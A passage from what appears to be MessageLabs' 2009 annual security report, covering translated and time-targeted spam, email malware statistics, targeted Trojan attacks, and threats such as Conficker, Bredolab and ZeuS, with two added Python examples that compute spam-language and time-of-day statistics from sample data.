wan and Austria. The CCTLDs least likely to receive Chinese-language spam were Portugal,
U.S., Netherlands and Germany.
English was the predominant language for all TLDs analyzed.
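The two views behind figures 22 and 23 (local-language share grouped by the client's registered country versus grouped by the recipient domain's CCTLD) can be reproduced on a small constructed data set. The following is an added example written for this page, not MessageLabs code or data; the spam records, the country-to-language map and the CCTLD map are all assumptions constructed for illustration, and the language of each message is taken as already detected by an upstream classifier.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class SpamRecord:
    """One blocked spam message (constructed sample record, not report data)."""
    recipient_domain: str   # domain the spam was addressed to
    client_country: str     # registered location of the receiving organization
    language: str           # language detected in the body (ISO 639-1 code)


# Assumed map of countries to their local languages (ISO 3166 alpha-2 -> ISO 639-1).
LOCAL_LANGUAGES: Dict[str, set] = {
    "BR": {"pt"},
    "CN": {"zh"},
    "DE": {"de"},
    "BE": {"fr", "nl", "de"},
}

# Assumed map of country-code TLDs to countries; generic TLDs are deliberately absent.
CCTLD_COUNTRY: Dict[str, str] = {"br": "BR", "cn": "CN", "de": "DE", "be": "BE"}


def country_from_cctld(domain: str) -> Optional[str]:
    """Country implied by the domain's TLD, or None for .com/.net/etc."""
    tld = domain.rsplit(".", 1)[-1].lower()
    return CCTLD_COUNTRY.get(tld)


def _local_share(records: List[SpamRecord],
                 country_of: Callable[[SpamRecord], Optional[str]]) -> Dict[str, float]:
    """Percentage of spam in the local language, grouped by country_of(record)."""
    totals, local = Counter(), Counter()
    for rec in records:
        country = country_of(rec)
        if country is None:          # no country signal (generic TLD): skip
            continue
        totals[country] += 1
        if rec.language in LOCAL_LANGUAGES.get(country, set()):
            local[country] += 1
    return {c: round(100.0 * local[c] / totals[c], 1) for c in totals}


def local_share_by_client_country(records: List[SpamRecord]) -> Dict[str, float]:
    """Figure 22 view: group by where the client organization is registered."""
    return _local_share(records, lambda r: r.client_country)


def local_share_by_cctld(records: List[SpamRecord]) -> Dict[str, float]:
    """Figure 23 view: group by the recipient domain's country-code TLD."""
    return _local_share(records, lambda r: country_from_cctld(r.recipient_domain))


def compare_views(records: List[SpamRecord]) -> Dict[str, Dict[str, float]]:
    """Side by side: a positive gap means location targeting, not TLD targeting."""
    by_country = local_share_by_client_country(records)
    by_tld = local_share_by_cctld(records)
    return {
        c: {"by_client_country": by_country[c],
            "by_cctld": by_tld.get(c, 0.0),
            "gap": round(by_country[c] - by_tld.get(c, 0.0), 1)}
        for c in by_country
    }


def _many(domain: str, country: str, lang: str, n: int) -> List[SpamRecord]:
    return [SpamRecord(domain, country, lang)] * n


# Constructed sample: a China-based company on a .com domain receives Chinese spam while
# its .cn partner domain receives only English; the same pattern for a Brazil-based company.
SAMPLE: List[SpamRecord] = (
    _many("acme-shanghai.com", "CN", "zh", 3)
    + _many("acme-shanghai.com", "CN", "en", 3)
    + _many("partner.cn", "CN", "en", 4)
    + _many("loja.com.br", "BR", "pt", 1)
    + _many("loja.com.br", "BR", "en", 3)
    + _many("globalcorp.com", "BR", "pt", 4)
    + _many("globalcorp.com", "BR", "en", 2)
)

if __name__ == "__main__":
    for country, row in compare_views(SAMPLE).items():
        print(country, row)
```

On this sample the client-country view reports 30% Chinese-language spam for China and 50% Portuguese for Brazil, while the CCTLD view reports 0% and 25%: the same shape as the gap the report describes between figures 22 and 23.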
Spammers had begun to use templates to engineer this translation “on-the-fly”. As the
spam messages were being composed, they were able to change company names, domain
names and other references as part of the automation process. Initially, the language for
translation was chosen based on the country top-level domain of the recipient's email
address; for example, an address ending in .fr may be translated into French, and .de
into German. However, the latest research showed that by the end of 2009, spammers were
targeting business domains based on their knowledge of the location of the organization.
We can only speculate where this data is obtained; for example, they may be using
information from the WHOIS registry for each domain, which includes the country where the
domain is registered.

Figure 24: Examples of auto-translated spam


The application of this technique to translate spam for different countries into different
languages revealed that spammers were using automated language translation tools in
significant volumes. Template-based automation had been used in the past, for example to
generate spam messages containing image attachments such as .JPG or .GIF files, where the
image contains the text of the spam message rendered as a bitmap. That technique was still
widely used in 2009, an indication of the potential longevity of automated spam translation
tools.
Further analysis of automatically translated spam revealed some messages that had been
badly translated and were therefore harder for a native speaker to read, even though they
were meant to be in that reader's local language. In some examples, English words from the
original template remained in the final message without being translated at all.


Figure 25: Translated spam with original English remaining


The use of free, online translation services had already become a favorite of 419-type
advance-fee fraudsters, enabling them to communicate in languages they were not proficient
in. However, it was only during the second half of 2009 that this approach was adopted by
spammers too.

3.6.2. Changing the Lexicon of Stove Spam


There’s more than one way to skin a cat, as the expression goes, and the same holds true
for language translation. In one example, relating to Russian stoves advertised in spam
emails, the text of the original message had been subtly changed in each variation. The
message remained the same, but slightly different wording was used in each case to alter
the translation of certain words, as can be seen in figure 26. Presumably this is to make it
harder for traditional anti-spam technology to create signatures able to identify and block
the messages.

Figure 26: Examples of Russian stove spam, using alternative wording


There were at least six variations of this particular scam. The scam itself was not new, but
the use of a lexicon or thesaurus, seemingly as part of the translation process, made it more
interesting.

3.6.3. Spam Linked to DDoS Attacks Against Social Networking Websites


In early August 2009, a number of very well-known social networking websites were
reported to be victims of distributed denial of service (DDoS) attacks. The attacks appeared
to be linked with a “Joe Job” style spam run against an anti-Russian blogger. A “Joe Job”
is a spam technique that spoofs the From: email address using a real email address (i.e. that
of an unsuspecting victim) to make it appear as though that person was responsible for the
email.


One such spam run was estimated to account for less than 1% of all spam at that time and
was distributed from a currently unclassified botnet. The run was significantly smaller than
some of the more recent spam runs, such as the URL-shortening attacks from Donbot.
Although this spam run may have contributed to the DDoS attacks reportedly targeting the
social networking websites, it was believed unlikely that this run alone could have caused
the reported disruption, suggesting that something else was involved. MessageLabs
Intelligence believes that a botnet was also used to conduct the DDoS attack in parallel with
the spam runs, using compromised computers under the botnet’s control to repeatedly visit
pages of the targeted social networking websites in an automated fashion.

3.6.4. Spam Operations Were Dominated by the U.S. Working Day


MessageLabs Intelligence researched what time of day you can expect to receive the most
spam, depending on your geographic location. The analysis highlighted that if you were
located in the U.S., spam activity peaked between 9 and 10 a.m. local time and trailed off to
much lower levels overnight.
Europeans received a steady stream of spam throughout their working day, whilst users in
the Asia-Pacific region started their day with an inbox already full of spam, with only small
amounts trickling in after this point until the evening.
Figure 27: Regional spam transmission based on time-of-day (chart: spam volume by hour over
24 hours of local time for Australia (EST, GMT/UTC +10), the UK (GMT) and the US East Coast
(EST, GMT/UTC -5), with the 08:00 to 17:00 workday marked)


This profile of activity suggested that spammers were predominantly active during the U.S.
working day, and reflected the fact that the most active spammers were based in the U.S.
(according to Spamhaus ROKSO). From a direct marketing perspective, it is also likely that
this is the time of day when the spammers’ largest target audiences are online and most
likely to respond. Understandably, across all regions, spam levels dropped significantly on
Sundays. For all countries examined (except Japan), spam levels dropped mid-week, with peak
activity on Mondays and Fridays.
Further analysis revealed that the source of this spam (based on the originating IP address
of the sender) was much more evenly distributed across the three main regions:
• 34.8% of spam originated from the Americas (21.4% from South America, 13.4% from
North America);
• 31.6% from Europe;
• 27.8% from Asia.
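The time-of-day profiles in figure 27 are built by converting each interception's UTC timestamp into the recipient region's local time and bucketing by hour. The following is an added example for this page, not MessageLabs code: it uses the fixed offsets printed on the figure (UTC-5, GMT, UTC+10; an assumption, since no daylight-saving rules are applied) and a constructed set of interception timestamps clustered around 14:00 UTC, which is 9 a.m. on the US East Coast.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Fixed offsets as labelled on figure 27 (assumption: no daylight-saving handling).
REGION_TZ = {
    "US_East": timezone(timedelta(hours=-5)),
    "UK": timezone.utc,
    "Australia_East": timezone(timedelta(hours=10)),
}


def hourly_profile(timestamps_utc: List[datetime], region: str) -> List[int]:
    """Count interceptions per local hour (index 0..23) for the given region."""
    tz = REGION_TZ[region]
    counts = Counter(ts.astimezone(tz).hour for ts in timestamps_utc)
    return [counts.get(h, 0) for h in range(24)]


def peak_hour(profile: List[int]) -> int:
    """Local hour with the most spam; ties resolve to the earlier hour."""
    return max(range(24), key=lambda h: (profile[h], -h))


def workday_share(profile: List[int], start: int = 8, end: int = 18) -> float:
    """Percentage of the day's spam that arrives during the local workday [start, end)."""
    total = sum(profile)
    return round(100.0 * sum(profile[start:end]) / total, 1) if total else 0.0


def regional_summary(timestamps_utc: List[datetime]) -> Dict[str, Dict[str, float]]:
    """Peak hour and workday share for every region, from one set of UTC timestamps."""
    summary = {}
    for region in REGION_TZ:
        profile = hourly_profile(timestamps_utc, region)
        summary[region] = {"peak_hour": peak_hour(profile),
                           "workday_share": workday_share(profile)}
    return summary


def _at(hour_utc: int, n: int) -> List[datetime]:
    """n constructed interceptions at the given UTC hour on a fixed day (aware datetimes)."""
    day = datetime(2009, 1, 14, tzinfo=timezone.utc)
    return [day.replace(hour=hour_utc)] * n


# Constructed sample: a burst at 13:00-15:00 UTC (the US East Coast morning), a smaller
# one at 20:00 UTC (US mid-afternoon) and a trickle at 03:00 UTC.
SAMPLE: List[datetime] = _at(13, 2) + _at(14, 5) + _at(15, 4) + _at(20, 2) + _at(3, 1)

if __name__ == "__main__":
    for region, row in regional_summary(SAMPLE).items():
        print(region, row)
```

With this sample the US East Coast profile peaks at 9 a.m. local time with almost all spam inside the workday, the UK sees the same burst in the early afternoon, and the Australian profile peaks at midnight local time, so most of the day's spam is already waiting when the workday starts: the three shapes described for figure 27.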

3.7. Spam predictions for 2010


3.7.1. Spammers Breaking the Rules
As the economy continues to suffer and more people seek to take advantage of the loose
restrictions of the CAN-SPAM Act, we’ll see more organizations selling unauthorized e-mail
address lists and more less-than-legitimate marketers spamming those lists.

3.7.2. As Spammers Adapt, Spam Volumes Will Continue to Fluctuate


Since 2007, spam has increased on average by 15%. While this significant growth in spam
e-mail may not be sustainable in the long term, it is clear that spammers are not yet willing
to give up as long as an economic motive is present. Spam volumes will continue to fluctuate
in 2010 as spammers continue to adapt to the sophistication of security software and the
intervention of responsible ISPs and government agencies across the globe.

3.7.3. CAPTCHA Technology Will Improve


As this happens and spammers have a more difficult time breaking CAPTCHA codes through
automated processes, spammers in emerging economies will devise a means to use real
people to manually generate new accounts for spamming, thereby attempting to bypass the
improved technology. Symantec estimates that the individuals employed to manually create
these accounts will be paid less than 10% of the cost to the spammers, with the account
farmers charging $30-40 per 1,000 accounts.

3.7.4. Instant Messaging Spam


As cybercriminals exploit new ways to bypass CAPTCHA technologies, instant messenger
(IM) attacks will grow in popularity. IM threats will largely comprise unsolicited spam
messages containing malicious links, especially attacks aimed at compromising legitimate
IM accounts. By the end of 2010, Symantec predicts that one in 300 IM messages will contain
a URL. Also, in 2010, Symantec predicts that overall, one in 12 hyperlinks will point to a
domain known to be used for hosting malware. Thus, one in 12 hyperlinks appearing in IM
messages will contain a domain that has been considered suspicious or malicious. In mid-
2009, that level was 1 in 78 hyperlinks.

3.7.5. Non-English Spam Will Increase


As broadband connection penetration continues to grow across the globe, particularly in
developing economies, spam in non-English speaking countries will increase. In some parts
of Europe, Symantec estimates the levels of localized spam will exceed 50% of all spam.


4. MALWARE: TOP THREATS OF 2009


4.1. Malware Summary
For email-borne malware, the average virus level for 2009 was 1 in 286.4 emails (0.35%), a
decrease of 0.35% from 2008, when levels averaged 1 in 143.8 emails (0.70%). The decline
can be attributed to a transition toward developing more variants (a 23% increase in 2009
compared with 2008) but sending fewer malicious emails per strain (approximately 5,827
malicious emails per strain in 2009, compared with 10,436 per strain in 2008).
In 2009, more than 73.1 million malware-infected emails were blocked, spanning over 2,500
different malware strains. This was an average of more than 5,800 malicious emails per strain
for 2009, compared with over 10,400 in 2008. The variety of malware increased in 2009 as it
became easier to create, distribute and use malware than in 2008.
Approximately 15.1% of malware intercepted in 2009 consisted of a malicious link contained
in the blocked email, rather than malware in an attachment.

2009 virus rate summary (values recovered from the chart on this page):
2009 virus rate: 1 in 286.4 (min September: 1 in 399.2; max November: 1 in 192.9)
Annual, 2005 to 2009 (Jan - Nov): 2005 1 in 36.9; 2006 1 in 84.6; 2007 1 in 115.5; 2008 1 in 143.8; 2009 1 in 286.4
Top 5 geographies: Luxembourg 1 in 112.2; China 1 in 173.3; Brazil 1 in 188.3; United Kingdom 1 in 199.2; Germany 1 in 225.8
Top 5 verticals: Education 1 in 119.2; Gov/Public Sector 1 in 147.8; Accom/Catering 1 in 166.8; Marketing/Media 1 in 214.2; Engineering 1 in 242.1
By horizontal (organization size): 1-250 1 in 217.8; 251-500 1 in 227.7; 501-1000 1 in 218.4; 1001-1500 1 in 254.1; 1501-2500 1 in 181.9; 2501+ 1 in 244.5

4.2. Themed Malware Attacks: Email Bourne on the Fourth of July


There were a number of malware attacks that made reference to U.S. Independence Day,
containing malicious hyperlinks purporting to show a fireworks video of the festivities.
Anyone following such a link would potentially have allowed their computer to become a
member of the Waledac botnet.
The vast majority of malware in circulation recently has been designed for the commission
of fraud, theft of personal information or the creation of a botnet. In a return to the
destructive malware typical of the last decade, Trojan.Dozer[4] was dropped onto infected
computers by a malicious email attachment, W32.Dozer, which also included a version of the
2004 MyDoom email worm, used to send the emails. MyDoom reached a peak infection rate
of 1 in every 12 emails in 2004.
The Trojan was linked[5] to a number of distributed denial of service (DDoS) attacks against
websites in the U.S. and South Korea. Aside from its DDoS capabilities, it also seemed to
have a more malevolent purpose[6], purportedly deleting files and corrupting hard disks on
10 July by overwriting the contents of files and the master boot record of the hard disk
itself. Infection levels were reportedly low, but the only way to recover data lost in this
way is to retrieve it from a good, clean backup.
In February, a number of targeted Trojans were identified that included additional SMTP
headers forged in an attempt to lend some degree of legitimacy to the email, and perhaps
increase the probability that it would not be recognized as a fake. The additional headers
were taken from real-world examples of earlier, genuine email messages, examples of which
could only have originated from the organization in question, suggesting that the attackers
had access to that information and used it to dress up subsequent attacks.

[4] http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2
[5] http://www.symantec.com/connect/blogs/born-4th-july
[6] http://www.symantec.com/connect/blogs/trojandozer-kicking-you-while-your-website-down


4.3. Targeted and Semi-Targeted Attacks


The ultimate aim of a targeted attack is to gain access to sensitive data or internal systems
by targeting specific individuals or companies. They are sent in relatively small volumes
compared with spam and phishing emails, for example, but are one of the most damaging
email threats. Targeted organizations frequently include government departments, military
organizations and suppliers, energy companies, media, NGOs and commercial companies
that trade internationally. In general any large or important organization that possesses
sensitive and valuable data is an attractive target.
The danger of targeted attacks is the stealthy deployment of an executable that quietly
performs some malicious operation on the recipient’s computer. Sometimes these executables
are attached directly to an email message as an .EXE (which to many would appear
suspicious), but increasingly they are hidden within legitimate-looking documents such as
.PDF, .DOC, .XLS or .PPT files. The recipient only has to open the attachment and their
computer is compromised.
The message received by the target is usually business related, or related to some news-
worthy event, from a webmail account or with a spoofed From address crafted to appeal to
the target, and in some way gives the impression that the attachment contains important
information, such as current affairs, meetings, legal documents, agreements or contracts.
However, sometimes they can contain general interest material, like funny items or health
advice. Very often the theme of the mail is related to an important topical event, to increase
the chances of grabbing the recipient’s attention. For example, in summer 2008 the topic of
the Beijing Olympics was very popular in targeted attacks.
Depending on the specific nature of the attack, spoofed .gov type email addresses are often
used for social engineering purposes, and free webmail addresses afford ease of use and
virtual anonymity.
On occasion the deception can be so successful that recipients open the attachment, and
then forward the mail to others, which propagates the targeted attack whilst simultaneously
increasing the chances of the attachment being opened, as recipients are more likely to
trust the known sender and not question the email’s contents.
The G20 summit held in London in April 2009 was the subject of a heightened number of
targeted Trojan attacks during March and April. On 2 April 2009, the G20, the group of 20
finance ministers and central bank governors, met in London; the meeting was the subject of
intense international media focus as well as of a rise in targeted malware attacks over the
previous two months.
On average in 2008 the number of targeted attacks was around 53 per day, rising to around
60 per day in Q1 2009. In the run-up to the G20 summit and the days following, this number
rose to around 100 per day before settling back to around 60 per day since. The average
number of targeted Trojans per day was 48 in 2009.
Figure 28: Monthly trend of individual targeted attacks (average/day) (chart covering Apr 08
to Nov 09; the plotted monthly values range from 23 to 107 per day)


The recipients of these attacks included individuals from some of the central banks involved
with the G20. The email included a .PDF attachment which, if opened, would cause a Trojan
downloader to be installed and executed. This would then download further spyware
components onto the target computer.
These targeted attacks began using G20-related topics for social engineering in late
February and early March, targeting financial institutions and central banks more intensively
during this period, until early April. The peak of activity began around mid-March, just
before the pre-G20 meeting of key financial stakeholders. It was noted that some attacks
were crafted as replies to actual non-malicious emails, indicating that at least one of the
recipients had already been infected.
Analysis of the types of exploit employed during 2009 revealed an increase in the use of
.PDF documents compared with other file types, as can be seen in figure 29.
Figure 29: Types of applications and exploits used in targeted attacks (chart: monthly share
of attachment types PDF, PPT, XLS, DOC, TXT, EXE and other, Apr 08 to Oct 09)
A typical example of a targeted attack shows how relevant the content can be to the
individual or organization being targeted.

Figure 30: Examples of targeted attack using application exploits in attached documents
In some more sophisticated examples, the target may be approached through an intermediary
that has already been compromised, typically a small to medium-sized business with a
supplier relationship with the intended target. Receipt of such an email from someone with
whom the target has already established a rapport makes it much more difficult to recognize
as an attack because of its provenance.
Globally, in the last six months of 2009, MessageLabs Intelligence identified that for clients
that were targeted by these types of attacks, an average of 38 targeted Trojans were blocked
per client, and on average, all clients may expect one targeted attack every two years.

Industry/sector     % of global targeted trojans   % customers targeted   1 in N customers targeted
Gov/Public Sector   34.7%                          34.7%                  5.1
Mineral/Fuel        2.0%                           2.0%                   5.7
Telecoms            2.1%                           2.1%                   7.4
Education           7.1%                           7.1%                   10.9
Non-Profit          3.2%                           3.2%                   11.9
Manufacturing       7.0%                           7.0%                   12.3
Engineering         0.6%                           0.6%                   12.4
Transport/Util      2.3%                           2.3%                   12.9
Admin               0.3%                           0.3%                   13.8
Chem/Pharm          1.5%                           1.5%                   13.9
Recreation          0.6%                           0.6%                   15.2
Marketing/Media     7.0%                           7.0%                   15.3
Automotive          0.0%                           0.0%                   17.3
General Services    1.7%                           1.7%                   17.4
Prof Services       7.7%                           7.7%                   18.9
Finance             10.6%                          10.6%                  23.7
Health Care         0.2%                           0.2%                   24.0
IT Services         5.5%                           5.5%                   24.7
Accom/Catering      0.1%                           0.1%                   24.8
Building/Cons       0.3%                           0.3%                   25.5
Wholesale           0.3%                           0.3%                   29.4
Other               0.5%                           0.5%                   32.8
Estate Agents       0.1%                           0.1%                   33.4
Agriculture         0.2%                           0.2%                   35.0
Retail              0.2%                           0.2%                   37.9
Unknown             4.3%                           4.3%                   58.4
Figure 31: Industries targeted
4.3.1. Status of Individuals Targeted
MessageLabs Intelligence analyzed a random selection of targeted Trojan attacks from the
second half of 2009 and ranked them according to the seniority of the recipients of each
attack, as follows:
• High - directors, vice presidents, high-level managers, senior executives;
• Medium - most professionals, mid-level managers, etc.;
• Low - secretarial, general administrative staff, etc.
If an attack was sent to a general mailbox like “enquiries@” or “info@” it was categorized
separately.
The analysis revealed that 60% of recipients were of high or medium-level ranking:
• 42% of targeted attacks were sent to high-ranking individuals;
• 18% of recipients were of medium-level seniority;
• 5% were of lower-ranking seniority;
• 19% of targeted attacks were directed at general mailboxes such as “enquiries@” or
“info@.”
Further investigation revealed that it was remarkably easy to discover the details of 84% of
the recipients of the attacks analyzed, using publicly available tools and search engines.
It seems clear that attackers tend to go for higher-ranking, more senior employees as they,
or rather their computers, may have access to the most valuable data. However, the analysis
also reveals that attackers target lower-ranking staff, such as secretaries and personal
assistants, perhaps in the hope that they would be less suspicious of an attack and more
inclined to forward the email to another contact internally.

4.3.2. Social Networking and Semi-Targeted Attacks


Many social networking websites opened up their APIs to third-party developers in 2009,
resulting in a rise in third-party applications appearing on social networking websites. Many
of these are likely to be increasingly targeted by attackers looking for vulnerabilities in the
APIs and in the websites upon which the applications are hosted.
Often social networking applications are hosted on legitimate domains outside the social
network infrastructure itself, and these are expected to come under attack through the
injection of malicious scripts and hidden malicious IFRAME HTML tags.
In 2009, some of the major social networking websites began to be targeted with rogue
third-party applications designed to harvest user profile information and to generate online
advertising revenue.
In 2009, criminals turned to public services such as popular micro-blogging sites to identify
people blogging about, for example, their first day in a new job. This would be the prelude to
a social engineering attack via another social network, such as those used mainly by
professionals, where the attacker masquerades as another employee of the same
organization, perhaps someone from the HR or IT department.
Over a period of time they build a rapport with the victim in order to understand the
company’s internal security measures, and use the information gathered in this way as the
prelude to spear-phishing attacks (e.g. “there’s a problem with your account – can you click
here to reset your password,” or “can you just confirm the URL that was given to you for the
VPN connection?”).

4.4. The Rise of Generic Droppers: Downadup/Conficker


Since its discovery by Symantec in November 2008, the malicious Downadup worm, also
known as Conficker, is believed to have infected more than 6 million computers worldwide.
In an effort to stifle its widespread proliferation and to mitigate the risks posed by such a
large botnet, Symantec, a number of global technology industry leaders and academics
formed a collaboration.
This alliance became known as the Conficker Working Group[7]. In February 2009, Microsoft
offered a reward of U.S.$250,000 to anyone able to identify the authors of the Downadup
malware, a reward which remained uncollected at the end of 2009.
Potentially one of the most concerning security threats of 2009, Downadup allows its
creators to remotely install software on infected machines. It is of particular concern
because the way in which the infected machines will be used has not yet been clearly
identified.
April Fools’ Day, the first day of April, is one time of the year when people are expected to
play tricks on one another, but in 2009 the date was also important for another reason, when
it became linked with the Downadup malware. Security analysts had identified that
computers already infected with earlier strains of this malware were timed to update
themselves to a newer, more advanced version (Downadup.C) on 1 April.
This update provided additional functionality to help the malware evade detection and
possible disruption, and introduced new anti-detection countermeasures allowing it to kill
processes relating to some anti-virus products.
On 8 April, a new strain was identified (Downadup.E), which also appeared to be dropping
copies of the Waledac malware. We may yet find out what Downadup has in store in 2010,
but the activities of the Conficker Working Group may have contributed to minimizing the
role this malware played in 2009. However, another generic Trojan dropper, Bredolab, has
perhaps been more active in 2009.

[7] For more information on Downadup (Conficker), please visit http://www.confickerworkinggroup.org


4.5. Bredolab Trojans Delivered by Cutwail Botnet


MessageLabs Intelligence tracked a dramatic rise in the volume of the Bredolab[8] Trojan
being sent by the Cutwail (Pandex) botnet. Bredolab is a Trojan that may arrive in the form
of a .ZIP file attachment to an email. The most notable examples appearing in the latter part
of 2009 had subjects referring to postal tracking numbers.

Figure 32: Example of Bredolab email


These Trojans were designed to give the sender complete control of the target computer.
The emails prompted the recipients to open and run the attachment, which would
automatically install the Trojan. Many different parcel services were referenced[9] in these
messages, including UPS, FedEx and DHL. In some variations, the email purported that the
potential victim was in receipt of a money transfer, and that the details were contained in
the attachment. Later examples[10] included fake messages suggesting that the recipient’s
password had been changed on a popular social networking site.
The percentage of spam relating to the Bredolab Trojan increased steadily in late 2009,
reaching its highest levels in October and November. Each day in October these spam
messages accounted for approximately 3.5% of spam and 5.6% of email-borne malware.
Global projections indicated that approximately 3.6 billion Bredolab malware emails were
likely to be in circulation each day at that time.
Figure 33: Bredolab emails spoofing a popular social networking site (chart: hourly
proportion, 0% to 35%, from 15:00 on 26 October to 08:00 on 27 October)

[8] For further information on Bredolab, please visit http://www.symantec.com/connect/blogs/taking-closer-look-trojanbredolab
[9] http://www.symantec.com/connect/blogs/bredolab-delivers-more-parcels-and-cash
[10] http://www.symantec.com/connect/blogs/bredolab-trojan-now-using-popular-social-networking-brand-spread


Bredolab contributed to 1.7% of all email-borne malware intercepted in 2009, or 3.4% of
all malware intercepted since June. As seen in figure 34, Bredolab malware interceptions
peaked on 16 November, when Bredolab accounted for 30.7% of email-borne malware in a
single day.
Figure 34: Bredolab Trojan interceptions in email-borne malware (chart: monthly proportion,
0% to 35%, January to December 2009)
Most of the Bredolab malware interceptions from web browser traffic were from legitimate,
but compromised websites, and from users attempting to download the malware by access-
ing web-based email accounts from their corporate network.
Figure 35: Bredolab malware blocked in web traffic (chart: proportion of web traffic blocked,
0.0% to 0.4%, 20 February to 20 October 2009)


Once installed, Bredolab attempted to disable the host based security in order to facilitate
the downloading of other malicious content. By nature, once this Trojan is on a system, it is
unlikely to be detected and could allow the controller to do whatever they wished with the
infected machine, such as installing other malware and spyware.
Cyber criminals were preying on the curiosity people feel when receiving an unexpected
parcel and were potentially delivering high levels of malware accordingly. In the run-up
to the holiday season, this tactic proved increasingly successful, suggesting that cyber
criminals were returning to a back-to-basics approach and were deliberately using .ZIP
file attachments as a way of evading detection from some email security vendors that only
blocked typical suspicious attachments, such as executables. Often .ZIP files were not on
this list of potentially suspicious files.
Because .ZIP files were the most common form of malicious file in 2009, blocking on the
attachment type alone was never going to be straightforward: .ZIP is a common file format
that has often been used to send malware in the past, but is often used legitimately too.
A .ZIP attachment does not in itself indicate an increased likelihood that a file is malicious;
however, most businesses are unlikely to use .ZIP files as part of their typical email
correspondence.
On a machine infected with Bredolab, access to many Windows tools is disabled, including:
• Task Manager: when the user presses Ctrl+Alt+Del;
• Registry: the user is unable to see the locations in the registry where the file hides itself
in order to be executed every time the system is restarted;
• File extensions are obscured, as Bredolab changes the default folder settings and disables
access to the Folder Options dialog from the Windows Explorer pane.


Figure 36: Changes made by Bredolab infection


Finally, Bredolab and its associated malware, which has hooked into the user’s web browser,
could hijack Internet search engine results pages (SERPs), injecting alternative hyperlinks
into the results pages that redirect users to alternative websites containing sponsored
hyperlinks. By clicking on these links the browser is eventually redirected to the correct web
pages, generating click-through revenue for the bad guys.

Figure 37: Bredolab and its associated malware hijacking SERP hyperlinks

4.6. The Rise of Malicious Websites, New Malware & Toolkits


4.6.1. Arresting the Spread of the ZeuS Trojan Toolkit
There was a flash of light at the end of the tunnel in November after officers from the U.K.’s
Metropolitan Police’s Central e-Crime Unit (PCeU) announced the first European arrests in
the battle against one particular piece of malware, ZeuS (aka Zbot). ZeuS is a sophisticated
Trojan toolkit that is believed to have infected and subsequently accessed personal information
from tens of thousands of computers around the world.
The malware enabled the distributors to harvest enormous amounts of personal data from
infected computers, with significantly large financial gains in store for the bad guys and
substantial losses for affected individuals and businesses.
The ZeuS Trojan is able to harvest users’ online bank account details and passwords, credit
card numbers and other personal information, including passwords for social networking
sites, passing this data back to servers under the control of the cyber criminals.
4.6.2. Rogue Security Software Update
New ways to conduct Internet fraud were uncovered in 2009 and one of the growing trends
to emerge during the course of the year was the use of misleading software programs,
especially “rogue” or bogus security software.
Rogue security software is a type of misleading application often known as “scareware,”
which purports to be legitimate, such as an anti-virus product. In reality, it provides the user
with little or no protection, and, in some cases, may facilitate the installation of malware
that claims to safeguard against it. Their purpose is to trick users into believing that the
rogue security application is valid and to convince them to pay for it.

37

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

A variety of methods are used by the bad guys to lure users to fraudulent websites, relying
heavily on social engineering tactics. Once installed, the rogue security software will typically
display a number of hoax security threats, but will encourage the user into visiting an
associated website in order to purchase the full software license.
In October 2009, Symantec published11 an in-depth analysis of rogue security software programs
and how they could affect users. The report included an overview of these programs,
how they work, their risk implications, various distribution methods and innovative attack
vectors.

Figure 38: Examples of rogue security software

4.6.3. Malicious websites on the rise


For 2009, the average number of new malicious websites blocked each day rose to 2,465,
compared to 2,290 for 2008, an increase of 7.6%. MessageLabs Intelligence identified
malicious web threats on 30,000 distinct domains; 80% of those domains were established,
legitimate websites that had been compromised, and the remaining 20% were new domains set
up purely with malicious intent.
Web-based malware became easier than ever to create in 2009, largely owing to the availability
of web-attack toolkits that enable even novices to create fairly sophisticated malware,
driving a trend towards increasingly more disposable malware, with threats appearing
and disappearing within a 24-hour timeframe.
For the bad guys, it can be a costly exercise to produce new families of malware in order to
maintain their criminal activity at sufficient levels. Registering new domains is much more
economical for them, and by spreading the malware across as many different websites and
domains as possible, the longevity of each new malware is increased.
When employing server-side polymorphism, the same family of malware code may be packaged
differently into new strains, automatically and dynamically, each time it is accessed.
This requires a different anti-virus signature each time in order to detect it accurately. These
approaches combined with the use of “bullet-proof” hosting services and “fast-flux” hosting
means that criminals can ensure that malicious websites are not taken down quickly in
response to complaints.
The emergence of server-side polymorphism has proven very effective and difficult to
safeguard against using traditional anti-virus signatures. The polymorphic engines, or the
algorithms used to change the code, do not reside within the malware itself, but remotely
- perhaps on the web server that is used to deliver the malware and cannot be analyzed
readily for creating signatures.
In many cases the organized criminals have highly automated techniques available to them
that require little or no monitoring, as their systems continue to operate automatically day
and night compromising as many new legitimate websites as possible and registering new
ones. Once these processes are in place, a compromised website can often be re-configured
or updated remotely depending on what method the attackers are using.
MessageLabs Intelligence analysis shows that the average number of new malicious websites
blocked each day rose to 2,465, and on average 40.5% of these were domains being
blocked for the first time. Similarly, analysis of the malware being blocked each day reveals
that around 15.9% was from new families of malware being blocked for the first time each
day, as seen in figure 39.

11 http://www.symantec.com/business/theme.jsp?themeid=threatreport
Figure 39: New web malware vs. new blocked domains (chart: Mar to Oct 2009, y-axis 0% to 90%)


In 2009, the nature of the threat shifted towards older, more well-established domains
being used to host much of the web-borne malware. Legitimate sites were more likely to
be trusted and were more valuable to the criminals if compromised through SQL injection
attacks, for example. Similarly, spammers abused the services of well-known online webmail
and social networking environments to host more spam content in order to evade detection.
When analyzing the MessageLabs Hosted Web Security Services (WSS) database, approximately
99.95% of Web Security Service (WSS) blocks were the result of policy-based rules
enforced by clients; the remaining 0.05% were blocks of malicious websites. The proportion
of WSS blocks that were malicious had been steadily increasing by the end of 2009, from
0.03% in September 2009, to 0.05% in November 2009.
Each day in 2009, 39% of WSS customers had a URL blocked because of a policy enforced
and for those customers, the average number of policy-based websites blocked was 6,265.
The average number of policy-based blocks per customer per day, remained steady at about
2,500 throughout the year.
In 2009, 10% of WSS customers had at least one malicious URL blocked each day. And for
those customers there were an average of 12.9 blocks each. The proportion of WSS customers
with malicious URLs blocked increased towards the end of 2009:
• Sept 2009: 9% of customers affected with 10.1 blocks each;
• Oct 2009: 8% of customers affected with 14.2 blocks each
Across the entire WSS customer base, the average number of malicious blocks made per
customer per day was 1.26. This also increased from 0.87 in September 2009 and 1.20 in
October 2009.
The likelihood of a user visiting malicious URLs increased during 2009 and by October,
the average number of malicious URLs blocked per client per day passed one for the first
time. This means that many businesses are increasingly likely to have at least one person
